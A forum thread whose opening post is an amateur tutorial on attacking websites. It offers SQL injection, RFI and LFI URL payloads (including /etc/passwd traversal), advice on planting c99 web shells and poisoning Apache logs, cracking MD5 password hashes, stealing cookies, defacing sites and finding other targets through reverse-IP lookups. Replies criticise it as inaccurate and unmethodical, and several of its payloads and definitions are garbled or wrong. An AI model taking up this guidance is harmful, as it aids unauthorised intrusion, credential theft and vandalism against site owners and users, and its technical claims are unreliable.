Results 1 to 5 of 5

Thread: Attacking Websites - Basic methodology Understanding Share/Save - My123World.Com!

  1. #1

    Attacking Websites - Basic methodology Understanding

    This is going to be probably a ongoing tutorial because there are so many ways



    But ill just start it off


    You can attack websites through multiple attack vectors

    1.SQL
    2.RFI
    3.LFI
    4.XSS
    5.Cookie Manipulation Injection
    6. CSRF

    etc etc


    Ill go each list briefly


    What is SQL?

    SQL Injection is nothing But executing sql queries in a websites url address params

    For example


    Code:
    www.site.com/index.php?param=-999999999 SELECT FROM table* Where id ="
    How Does that Benefit you?


    By executing SQL queries in the params of a url address you can pull database information

    such as username passwords

    lets say site 1 is vulnerable to a SQL Injection attack

    You pull the username and passwords from the database

    What happens then?

    You either get plaintext or encrypted hash codes ( MD5,MD4,SHA1) etc etc

    A site i like to use for decrypting md5 passwords is

    *Google md5decrypt you will see the .net* click that one

    i use that because it has never failed me

    So lets say you want to inject a C99 Shell you would execute something about INFILE

    just google that i dont remember the full query

    that query will allow you to inject a c99 shell * Debatable *

    So now you have decrypted the username and password and you have logged into
    the administration page

    Now you will search for some way to upload a c99 shell - etc etc

    Or be like everyone else and probably deface the site and move on.

    -------------------------------------------------------------------------------


    A RFI is a Remote File Inclusion ( Which still works by the way even tho Redhat Company paid developers of PHP over a million $'s to get it fixed yet it still exist)

    with a RFI you can inject a c99 shell or what have you into the site

    because of the _GET in the code

    example


    http://www.site.com/index.php?param=...com/file.php??

    Oh also for the PHP injection you can some times execute php code in the params like

    param=<?php info>

    moving back to RFI after you included the shell you can go about your business and upload a copy to the server and start doing your evil bidding

    ------------------------------------------------------------------------

    LFI - Local File Inclusion Vulnerability

    With a LFI you can view files within the params of a url like so

    http://www.site.com/index.php?param=....../etc/passwd


    Here is one of my personal tips for a LFI

    Check the History xD through that you might get lucky and get the password of the userid your executing that on - or if apache is running under root you can even probably pull the password to the root

    you can also inject a c99 shell into the apache log files through get request etc etc

    ----------------------------------------------------------------------------------------------

    XSS -
    Honestly a XSS attack is bullshit in the first place unless its permanent

    If its permanent you can inject a XSS attack to pull the Cookie datas

    Go to http://ha.ckers.org/xss.html which will redirect you to owsawp


    Or just google xss cheat sheet and click the owsawp one

    i hate xss and i dont like talking about it

    ---------------------------------------------------------------------------------------

    Cookie Injection

    Through Cookie injections you can pull someones cookies and logged into the site as them

    By using the Cookie addon from firefox

    If you have someones cookies that have the encrypted password to there site

    you can add that cookie to yours and whola you have now logged in

    -----------------------------------------------------------------------------------------


    Obviously i didnt go into great detail about these multiple attack vectors but you get an idea where im coming from



    So now what do you do?


    Youve learned all attack vectors and you browse to a site that just isnt vulnerable


    Next what you will do is do a whois on the ip address and then go to a site that does Reverse IP that will show you all the websites on the server you can then use multiple attack vectors on that sites hosted on the server that will allow you possible access to the site

    And by reading my other tutorial you can use that knoweldge to figure out how to gain access to the site your after


    If you need any help or further questions about this tutorial just ask and ill be glad to answer them

  2. #2
    This is not a methodology. A methodology would explain the steps from target selection to profiling to mapping to vulnerability scanning to exploitation. These are just randomly spewed out attack vectors.

    "SQL Injection is nothing But executing sql queries in a websites url address params" - really? That is not the definition of SQL injection now is it. How about when it is parameter or cookie injection based? How about explaining blind injection, timing based etc.

    'Youve learned all attack vectors" - <sigh>

    Sorry to be a pain but if you can't be helpful then you are just the blind leading the blind.

  3. #3
    Super Commando Dhruv abhaythehero's Avatar
    Join Date
    Sep 2010
    Location
    Lucknow/Pune,India
    Posts
    466
    Blog Entries
    2
    Quote Originally Posted by pete_the_ram View Post
    This is not a methodology. A methodology would explain the steps from target selection to profiling to mapping to vulnerability scanning to exploitation. These are just randomly spewed out attack vectors.

    "SQL Injection is nothing But executing sql queries in a websites url address params" - really? That is not the definition of SQL injection now is it. How about when it is parameter or cookie injection based? How about explaining blind injection, timing based etc.

    'Youve learned all attack vectors" - <sigh>

    Sorry to be a pain but if you can't be helpful then you are just the blind leading the blind.
    Would you be kind enough to extrapolate your observations and enlighten us truly as to what you would have posted in place of the topic starter. Unhappy as you are with the topic starter.
    In the world of 0s and 1s, are you a zero or The One !

  4. #4
    I merely think that if a user states they are going to share an attack methodology then the post should be a methodology - surely that is a fair enough request.

    My example of the SQL injection section was again just to say that the information presented was not very factual or helpful. I was merely trying to ensure newcomers do not read this and take it for the truth.

  5. #5
    Garage Newcomer
    Join Date
    Feb 2013
    Location
    127.0.0.1
    Posts
    15
    @ Mods please close these kind of threads, with due respect to topic creator, Sorry bro this is simply wasting each others time.
    "In order to change the world all you need to do is Tweak the Source Code"

    Things to do : Make a Difference (M.A.D)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •